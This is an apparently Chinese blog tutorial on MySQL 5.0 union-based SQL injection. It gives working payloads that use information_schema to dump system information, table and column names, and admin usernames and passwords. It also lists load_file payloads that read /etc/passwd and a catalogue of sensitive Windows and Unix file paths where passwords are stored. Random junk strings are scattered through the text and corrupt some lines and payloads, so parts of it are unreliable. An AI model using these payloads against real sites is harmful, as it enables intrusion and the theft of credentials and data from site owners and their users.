mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。


* @: {* r; W! F: N
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
- k( i: f' t) B0 S# |* g2 @7 g中记录了Mysql中所有
! z6 i' Z; F( r$ e: l5 s存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
$ I$ U7 e9 s3 U+ l$ D' }- W明。
7 F- {: r9 b8 ]  j6 d/ j, }/ v5 f1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
|—字段：SCHEMA_NAME ->数据库名称
* b, a8 v& t& {% S9 X
: e# Z7 |5 V2 M1 Y2 W7 k+ o|TABLES ->存储表名
; d% y& I0 {+ f$ ~|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
: _4 t5 A% n! M( a% y|—字段：TABLE_NAME ->存储表的表名
8 j0 X2 ?+ M) X2 s9 D8 Q2 v
! r" w! ?' V* q, [! o|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
  l# X( t, d+ E7 V8 x/ t, F% |! U|—字段：TABLE_NAME ->存储所属表的名称

. t* m$ n. v: E) M- F0 X|—字段：COLUMN_NAME ->该字段的名称

* B; G' O9 ^6 y$ _& ?9 M# \#########################################################################
% {; h7 b8 i) R( \##
6 x( ^* U. n6 l$ y  ^7 Z( k
  `$ B4 L6 f1 H6 P' e/ k1 [0×001 获取系统信息:

% x' A7 x* F4 [union select 1,2,3,4,5,concat
9 \4 [2 O; b* W. V(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
( {  j  }* v! w# j: R( A
/*
8 a* @; T- z7 q1 _, Y6 d+ W4 Z/ w
@@global.version_compile_os 获取系统版本

@@datadir 数据库路径
database() 当前数据库名称
0x3c62723e 换行HEX值
6 L& Y* @# Y( }: o; J; }( `
0 Z' O- ?- P( E1 V( |*/
( t1 k- t" r* V, N
- W0 C# l  Z8 ]% H######################################################################

0×002 获取表名

( y( o7 M/ h+ X7 U6 {# X1 Qunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
, E' i5 V+ o: g# Finformation_schema.tables where table_schema=0x67617264656e /*

$ ~0 _! y7 G/ q! [/*
# i& }& p4 ^' f* y2 c& M' U- y- Z
" l7 ]4 Y6 |0 z( X" t* W# W7 k0x67617264656e 为当前数据库名
: M" a% ^8 _, N4 e; @
1 n  F- v( m  P! }, A: `group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

  s" ~. e3 W# E( x1 p8 ^*/
  }* _1 T2 u4 P7 a+ i2 V
8 `, A% W: k# y5 h1 c% W######################################################################
$ h" y) X5 e+ V
8 ?& |* H3 @/ X# E3 t0×003 获取字段
% u; [( X$ c, a5 l4 V: w
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
: Y" Z1 _& a8 Pinformation_schema.columns where table_name=0x61646d696e and
5 b5 o6 |7 z; |. Z4 I. z& A
3 s; C; m  W- H$ s4 o
table_schema=0x67617264656e limit 1 /*

/*

2 p) F7 }5 G* Y/ l3 b2 Hgroup_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段
; {4 y9 W$ m7 R. C6 j( j+ M7 c
$ S2 s* f9 P2 j' Q* O: E0x61646d696e ->选择一个表
& N0 n# A6 z# ~& ^1 {
- P; r1 S  M" K9 O" I& [& R0x67617264656e ->数据库名
/ ^: O" {2 d6 G+ O+ j
4 u& v( }) g) w% O2 I6 Z*/
( Z: {( C, k8 Q& }
#####################################################################
5 f: P$ M$ K$ B2 X+ N/ E
% s% t2 Q# J8 f  u$ Y0×004 获取数据

  g" K- g, n8 B& g( d2 p7 x+ T8 Ounion select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

union select 1,group_concat(id),group_concat(adname),4,5,group_concat
" V. N& x2 T0 k# J$ m- |0 K5 D(adpassword),6,7,8 from admin

/*

0x3c62723e 换行符号HEX编码
7 X2 z7 d" G4 ~" Z: z/ O
group_concat 同时获得该字段所有数据
  l2 T, g# f  Y4 a% h0 t
*/



" m9 f7 d/ |8 B% `

顺便添加一些mysql注入时非常有用的一些东西

简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
, O, D0 Y- y0 J4 M3 ~
1:system_user() 系统用户名
2:user()        用户名
; b/ a* r  _( P. D& x7 A3:current_user()  当前用户名
4:session_user()连接数据库的用户名
5:database()    数据库名
% P# E, h1 I$ {& {9 Q+ x6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
8@datadir     读取数据库路径
7 Z" r0 Y" _2 k6 c" d( k& _9@basedir    MYSQL 安装路径
! ~: \2 V4 r% W  q" U10@version_compile_os   操作系统  Windows Server 2003,
收集的一些路径：
% Z6 K& Z9 ~3 J$ a. Q. i) CWINDOWS下:
c:/boot.ini          //查看系统版本
c:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
8 N0 J8 N- D6 M. n' F4 \- Tc:/winnt/php.ini
c:/winnt/my.ini
% @3 G8 ^2 w' x; Zc:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
+ S# E0 C1 \4 c8 ^* Q1 Qc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
2 D$ l* r% X" Bc:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
9 W1 ?' U4 ?& v  z4 @& d( V1 Hc:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
. C3 s8 T! L  V' [; j! O( u3 ~8 m& h
, r( k& H% M! L: j0 w
c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
! c6 h. X$ U1 G# ?* yd:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
$ w, H$ v  u* J$ k+ }C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
; ]1 n" |: [$ `7 T1 ^7 V, I9 y
/ y; h: G, b$ {, ZLUNIX/UNIX下:
; t; Z& i" e; K/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
& K4 L5 g0 m# J/usr/local/apache2/conf/httpd.conf
4 u" H% `8 R- K, ?7 t% u% d6 ]/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
, S1 H8 }( G: |/ w, p/usr/local/app/php5/lib/php.ini //PHP相关设置
( s, v8 E1 ^; g- R5 F/etc/sysconfig/iptables //从中得到防火墙规则策略
. P  l7 F. O- t: C/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
/etc/issue
/etc/issue.net
/ X, a2 Q* i! j6 e2 I3 j/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
; y* w7 l) o* K9 |. ?5 i: O/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
9 }* {1 J( h3 i2 N7 r8 b/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
1 n+ v, @7 q' }" o/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
# Y6 i  x4 p1 R6 O+ W4 C/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
. x, w& A3 z6 X3 F( u/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
* z1 b4 v/ D' ?7 @- G3 R. Creplace(load_file(0x2F6574632F706173737764),0x3c,0×20)
+ A, s9 G" }& Y& V$ xreplace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
' a- }3 j' `& e$ }上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
2 O, q- L7 \5 Q/ q
/ i- w& _+ _% T3 _